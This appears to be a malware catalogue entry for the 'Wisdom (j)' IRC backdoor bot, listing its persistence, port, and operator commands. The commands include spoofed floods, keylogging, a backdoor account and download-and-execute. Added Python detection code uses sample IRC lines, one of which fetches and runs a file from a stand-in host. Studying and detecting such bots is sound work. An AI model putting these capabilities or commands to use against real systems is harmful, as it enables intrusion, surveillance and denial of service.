Wisdom (j)

Released: March 2004

Copyright © MegaSecurity

By ?


Information
Author ?
Family Wisdom
Category Remote Access
Version Wisdom (j)
Release date: Mar 2004
Language C++, compressed with UPX, source included
Additional Information
dropped files:
c:\WINNT\RUNDLL16.EXE  size: 16,896 bytes 
c:\WINNT\temp.bat      size: 92 bytes 

port: 559 TCP

startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Windows DLL Loader"
data: C:\WINNT\RUNDLL16.EXE 

tested on Win2000
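A host-side check for the indicators recorded above, added here as an editor's example; it is not MegaSecurity's tooling or the bot author's code. It takes three artefacts a responder would already have collected (a `reg export` dump of the Run key, `netstat -ano` output, and a path-to-size map of suspect files) and reports entries that match the page's indicators. The inputs below are constructed to look like real tool output, and the "16.896 bytes" on the page is read as 16,896 bytes.

```python
import re

# Indicators recorded on this page for Wisdom (j); 16.896 read as 16,896 bytes.
RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE_NAME = "Windows DLL Loader"
RUN_VALUE_DATA = r"C:\WINNT\RUNDLL16.EXE"
DROPPED_FILES = {r"c:\winnt\rundll16.exe": 16896, r"c:\winnt\temp.bat": 92}
LISTEN_PORT = 559


def check_registry(reg_export: str) -> list:
    """Walk 'reg export' text ([key] sections, "name"="data" lines) and report
    Run entries that match the bot's value name or its dropped binary."""
    hits, section = [], None
    for line in reg_export.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        m = re.match(r'^"([^"]+)"="(.*)"$', line)
        if not m or section is None or section.lower() != RUN_KEY.lower():
            continue
        name, data = m.group(1), m.group(2).replace("\\\\", "\\")  # .reg doubles backslashes
        if name == RUN_VALUE_NAME or data.lower() == RUN_VALUE_DATA.lower():
            hits.append(f"Run value {name!r} -> {data}")
    return hits


def check_listeners(netstat_output: str) -> list:
    """Report TCP LISTENING sockets on the bot's port in 'netstat -ano' output."""
    hits = []
    for line in netstat_output.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[0] == "TCP" and parts[3] == "LISTENING":
            local = parts[1]
            if int(local.rsplit(":", 1)[1]) == LISTEN_PORT:
                pid = parts[4] if len(parts) > 4 else "?"
                hits.append(f"TCP listener on {local} (PID {pid})")
    return hits


def check_files(file_sizes: dict) -> list:
    """file_sizes maps an on-disk path to its size; compare against the dropped files."""
    hits = []
    for path, size in file_sizes.items():
        expected = DROPPED_FILES.get(path.lower())
        if expected is None:
            continue
        note = "size matches" if size == expected else f"size differs (expected {expected})"
        hits.append(f"{path}: {note}")
    return hits


def scan(reg_export: str, netstat_output: str, file_sizes: dict) -> list:
    """All three checks combined; one string per indicator found."""
    return check_registry(reg_export) + check_listeners(netstat_output) + check_files(file_sizes)


# Constructed sample evidence, shaped like the real tools' output.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Synchronization Manager"="mobsync.exe /logon"
"Windows DLL Loader"="C:\\WINNT\\RUNDLL16.EXE"
"""

SAMPLE_NETSTAT = """  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       420
  TCP    0.0.0.0:559            0.0.0.0:0              LISTENING       1088
  TCP    192.168.1.20:1044      10.0.0.5:6667          ESTABLISHED     1088
"""

SAMPLE_FILES = {r"C:\WINNT\RUNDLL16.EXE": 16896, r"C:\WINNT\temp.bat": 92,
                r"C:\WINNT\notepad.exe": 50960}

if __name__ == "__main__":
    for hit in scan(SAMPLE_REG, SAMPLE_NETSTAT, SAMPLE_FILES):
        print(hit)
```

A size mismatch on RUNDLL16.EXE is still worth reporting: the source was shipped with the bot, so rebuilt or repacked variants will differ from the 16,896-byte sample while keeping the same name and Run value.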

Author Information / Description
*Fixed; Nick length bug that caused some bots not to connect
 *Fixed; chankey support, didn't really have to do anything..(line 236, numbers only, you can easily make it alpha too but I'm not telling how, figure it the fuck out)
 *Enabled; bot creates a backdoor account on the box, find it and comment it out to turn it off
 
  
commands:
  "*" beside a command means it isn't working correctly
  *NOTE* MAKE SURE YOU PUT IN CORRECT PARAMETERS, AS THE BOT MAY CRASH IF YOU DON'T
  1)  ! version - request version of bot
  2)  ! moo - exit bot
  3)  ! spoof get - get current spoof address
  4)  ! spoof off - disable spoofing from ip, only spoof from current subnet (default)
  5)  ! spoof <ip> - set spoofing to an ip address (this can be used for example with ping, to create a smurf attack, or a syn flood to create a drdos attack)
  6)  ! icmp <ip> <time> - sends random icmp codes to an ip address for an allotted time (512 byte packets + spoofing)
  7)  ! ack <ip> <port> <time> - attacks an ip with ack packets (spoofing, VERY fast sending)
  8)  ! syn <ip> <port> <time> - attacks an ip with syn packets (spoofing, TURBO fast sending)
  9)  ! random <ip> <port> <time> - alternates between syn/ack packets (spoofing, REALLY fast sending)
  10) ! enable <password> - attempts to enable commands on the bot, the password is what you set with the disable command
  11) ! disable <password> - if bot is enabled, disables it, and sets the enable password
  12) ! udp <ip> <port> <time> - sends udp packets (spoofed) to an ip, if port = 0 then it uses random destination ports
  13) ! dns <ip/host> - resolve a host/ip
  14) ! exec <file> [command line] - opens a file (no spaces)
  15) ! uptime - get the system uptime
  16) ! keyspy enable <number between 0 to 15> - enable real time irc based keylogger, the number is used as the colour for the messages (easier to read with many bots)
  17) ! keyspy disable - disable real time irc keylogger
  18) ! delete <file> - delete a file off victims hard disk
  19) ! send <nick> <file> <send as> - sends a file to someone
  20) ! active - returns the active window (useful if you're looking for an interesting screen capture)
  21) ! capture screen <save as> - takes a screen shot
  22) ! capture drivers - list video for windows device(s)
  23) ! capture frame <save as> <index> <width> <height> - captures a frame (bitmap) from a video for windows device
  24) ! capture video <save as> <index> <time> <width> <height> - captures a video (avi) from a video for windows device
  25) ! pscan <subnet> <port> <type> [delay] - scan a subnet for open ports.. if type is 1 then subnet is X, if type is 2 then subnet is X.X, etc..
  26) ! sysinfo - gives you some info about the system
  27) ! raw <command> - sends a raw command to the server
  28) ! dload <http url> <file> [execute] - downloads a file, execute is a boolean of whether to execute
  29) ! clone load <server> <port> - loads 1 clone onto a server 
  30) ! clone kill - disconnects all clones
  31) ! clone raw <command> - sends a raw command to the server
  + you can dcc files to the bot
  + dcc chat console with basic file/process manager
  + socks4 server running on port 559
  + basic plugin system

to do:
  http request generator (banner clicking)
  find files command

notes:
  the port scanner can perform various actions based on what port you are scanning..
    - port 1433: it will auto check if the 'sa' account is present on an SQL server
    - port 80: it will auto check if the host is vulnerable to a version of the unicode IIS exploit
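The command list above is a usable detection signature: every operator command is a channel message starting with "!" followed by a keyword, and the author's warning that wrong parameters crash the bot gives the argument counts to check. The following Python is an added example (not the bot's code, which is C++) that scans IRC PRIVMSG lines for Wisdom commands, tags each by what it does, and validates the arity and the IP/port/time arguments of the flood commands. It assumes the "!" may or may not be followed by a space, as the list shows "! version"; the log lines are constructed.

```python
import re
from typing import Optional

# Argument counts from the command list above: (min, max, category). None = takes the rest of the line.
WISDOM_COMMANDS = {
    "version": (0, 0, "control"), "moo": (0, 0, "control"),
    "uptime": (0, 0, "recon"), "sysinfo": (0, 0, "recon"), "active": (0, 0, "surveillance"),
    "spoof": (1, 1, "ddos"), "icmp": (2, 2, "ddos"),
    "ack": (3, 3, "ddos"), "syn": (3, 3, "ddos"), "random": (3, 3, "ddos"), "udp": (3, 3, "ddos"),
    "enable": (1, 1, "control"), "disable": (1, 1, "control"),
    "dns": (1, 1, "recon"), "exec": (1, None, "execution"),
    "keyspy": (1, 2, "surveillance"), "delete": (1, 1, "file"), "send": (3, 3, "file"),
    "capture": (1, 6, "surveillance"), "pscan": (3, 4, "scan"),
    "raw": (1, None, "control"), "dload": (2, 3, "execution"), "clone": (1, None, "control"),
}
FLOOD_COMMANDS = ("icmp", "ack", "syn", "random", "udp")

IRC_PRIVMSG = re.compile(r"^(?::(?P<src>[^ ]+) )?PRIVMSG (?P<target>[^ ]+) :(?P<text>.*)$")
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def parse_command(text: str) -> Optional[dict]:
    """Return the Wisdom command carried by a message body, or None if it is not one.
    Assumption: prefix is '!' with optional whitespace before the keyword."""
    m = re.match(r"^!\s*(\w+)(?:\s+(.*))?$", text.strip())
    if not m or m.group(1).lower() not in WISDOM_COMMANDS:
        return None
    name = m.group(1).lower()
    args = m.group(2).split() if m.group(2) else []
    lo, hi, category = WISDOM_COMMANDS[name]
    problems = []
    if len(args) < lo or (hi is not None and len(args) > hi):
        problems.append(f"expected {lo}-{hi if hi is not None else 'n'} args, got {len(args)}")
    if name in FLOOD_COMMANDS and not problems:
        if not IPV4.match(args[0]):
            problems.append("target is not an IPv4 address")
        # icmp has no port; udp allows port 0 (random destination ports)
        if name != "icmp" and not (args[1].isdigit() and 0 <= int(args[1]) <= 65535):
            problems.append("port out of range")
        if not args[-1].isdigit():
            problems.append("time is not an integer")
    return {"command": name, "args": args, "category": category, "problems": problems}


def scan_irc_log(lines) -> list:
    """Flag PRIVMSGs that carry a Wisdom command; one record per hit, with sender and target."""
    hits = []
    for line in lines:
        m = IRC_PRIVMSG.match(line.strip())
        if not m:
            continue
        cmd = parse_command(m.group("text"))
        if cmd:
            cmd["from"] = (m.group("src") or "?").split("!")[0]
            cmd["target"] = m.group("target")
            hits.append(cmd)
    return hits


# Constructed IRC traffic: an operator driving one bot, plus noise that must not match.
SAMPLE_IRC = [
    ":bot1!~w@10.1.1.7 JOIN #w1sd0m",
    ":op!~x@203.0.113.9 PRIVMSG #w1sd0m :! version",
    ":bot1!~w@10.1.1.7 PRIVMSG #w1sd0m :wisdom (j)",
    ":op!~x@203.0.113.9 PRIVMSG #w1sd0m :! syn 198.51.100.20 80 300",
    ":op!~x@203.0.113.9 PRIVMSG #w1sd0m :! syn 198.51.100.20 80",
    ":op!~x@203.0.113.9 PRIVMSG #w1sd0m :! keyspy enable 4",
    ":op!~x@203.0.113.9 PRIVMSG #w1sd0m :! dload http://203.0.113.9/up.exe up.exe 1",
    ":someone!~y@192.0.2.4 PRIVMSG #w1sd0m :!roll 2d6",
]

if __name__ == "__main__":
    for hit in scan_irc_log(SAMPLE_IRC):
        flag = "BAD ARGS" if hit["problems"] else "ok"
        print(f"{hit['from']} -> {hit['target']}: {hit['command']} {hit['args']} [{hit['category']}] {flag}")
```

Matching on the keyword alone would fire on ordinary "!"-triggered channel bots (the `!roll` line), so the command set is the whitelist; a real deployment would also want the DCC CHAT and file-send traffic the author lists, which this signature does not cover.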
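The "socks4 server running on port 559" line gives a network-side check to pair with the host indicators: connect to 559 on a suspect host, send a SOCKS4 CONNECT, and see whether a SOCKS4 reply (version byte 0, code 90 = granted) comes back. The Python below is an added example, not code from the bot or from MegaSecurity; it builds the request, decodes the reply, and runs the exchange against a constructed stand-in socket so it can be checked offline. A granted reply proves only that a SOCKS4 proxy is listening, not that it is Wisdom; use it together with the Run key and dropped files above.

```python
import socket
import struct

# SOCKS4 CONNECT: VN=4, CD=1, DSTPORT (2 bytes), DSTIP (4 bytes), USERID, NUL.
# Reply: VN=0, CD (90 granted, 91-93 rejected), DSTPORT, DSTIP.
SOCKS4_GRANTED = 90


def socks4_connect_request(dst_ip: str, dst_port: int, userid: str = "") -> bytes:
    """Build the 9+ byte SOCKS4 CONNECT request for dst_ip:dst_port."""
    return struct.pack("!BBH4s", 4, 1, dst_port, socket.inet_aton(dst_ip)) + userid.encode() + b"\x00"


def parse_socks4_reply(data: bytes) -> dict:
    """Decode the 8-byte SOCKS4 reply; raises on anything shorter."""
    if len(data) < 8:
        raise ValueError("short SOCKS4 reply")
    vn, cd, port, ip = struct.unpack("!BBH4s", data[:8])
    return {"version_ok": vn == 0, "granted": cd == SOCKS4_GRANTED, "code": cd,
            "bind_port": port, "bind_ip": socket.inet_ntoa(ip)}


def probe_socks4(sock, dst_ip: str = "127.0.0.1", dst_port: int = 80) -> dict:
    """Run the handshake over an already-connected socket-like object (sendall/recv)."""
    sock.sendall(socks4_connect_request(dst_ip, dst_port))
    return parse_socks4_reply(sock.recv(8))


class FakeBotSocket:
    """Constructed stand-in for a host answering on 559: records what was sent, replies 'granted'."""
    def __init__(self, reply: bytes = b"\x00\x5a\x00\x50\x7f\x00\x00\x01"):
        self.sent = b""
        self.reply = reply

    def sendall(self, data: bytes) -> None:
        self.sent += data

    def recv(self, n: int) -> bytes:
        return self.reply[:n]


if __name__ == "__main__":
    # Live use (assumption: the suspect host is reachable and you are authorised to probe it):
    #   s = socket.create_connection((host, 559), timeout=5); print(probe_socks4(s)); s.close()
    print(probe_socks4(FakeBotSocket()))
```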
